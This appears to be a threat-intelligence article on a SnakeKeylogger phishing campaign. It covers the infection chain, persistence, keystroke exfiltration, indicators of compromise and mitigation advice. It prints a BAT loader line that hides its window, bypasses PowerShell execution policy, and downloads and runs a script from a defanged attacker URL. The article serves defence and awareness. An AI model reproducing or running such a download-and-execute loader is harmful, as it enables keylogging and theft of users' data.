In recent cybersecurity developments, SnakeKeylogger has emerged as a formidable infostealer, adept at leveraging PowerShell scripts and sophisticated social engineering tactics to infiltrate systems and exfiltrate sensitive information. This malware’s operators craft convincing spear-phishing emails, often under aliases like CPA-Payment Files, impersonating reputable financial and research institutions to deceive recipients.
Infection Mechanism
The attack initiates when a recipient opens an email attachment, typically an ISO or ZIP file, containing a seemingly benign batch (BAT) script. Upon execution, this script downloads and launches a PowerShell payload designed to harvest keystrokes and system information before transmitting the data to a remote server. The BAT script employs commands such as:
“`batch
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Command & {iwr hxxp://fxa.sabitaxt.com/mc55tP.ps1 -OutFile %TEMP%\snake.ps1; Start-Process powershell -ArgumentList ‘-NoP -NonI -W Hidden -Exec Bypass -File %TEMP%\snake.ps1’}
“`
This approach bypasses standard execution policies and conceals visible windows, allowing SnakeKeylogger to operate without raising suspicion.
Persistence and Data Exfiltration
Once activated, the PowerShell script establishes persistence by creating scheduled tasks and modifying registry entries, ensuring the malware survives system reboots and evades cursory incident response efforts. The script invokes Windows API functions to capture keystrokes, clipboard contents, and active window titles. The collected information is then batched, encoded, and transmitted to a command-and-control server controlled by the attackers.
Indicators of Compromise (IoCs)
Security researchers have identified specific IoCs associated with this campaign, including BAT payload SHA256 hashes and the PowerShell script URL hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1. These indicators are crucial for organizations to detect and mitigate the threat effectively.
Recommendations for Mitigation
To defend against SnakeKeylogger and similar threats, organizations should implement the following measures:
1. User Education: Conduct regular training sessions to educate employees about the dangers of phishing emails and the importance of verifying the authenticity of email attachments and links.
2. Email Filtering: Deploy advanced email filtering solutions to detect and block malicious attachments and links before they reach end-users.
3. Endpoint Protection: Utilize comprehensive endpoint protection platforms that can detect and prevent the execution of malicious scripts and unauthorized PowerShell commands.
4. Regular Updates: Ensure that all systems and software are up-to-date with the latest security patches to minimize vulnerabilities that could be exploited by malware.
5. Monitoring and Incident Response: Establish continuous monitoring mechanisms to detect unusual activities and have an incident response plan in place to address potential breaches promptly.
By adopting these proactive measures, organizations can significantly reduce the risk posed by SnakeKeylogger and enhance their overall cybersecurity posture.
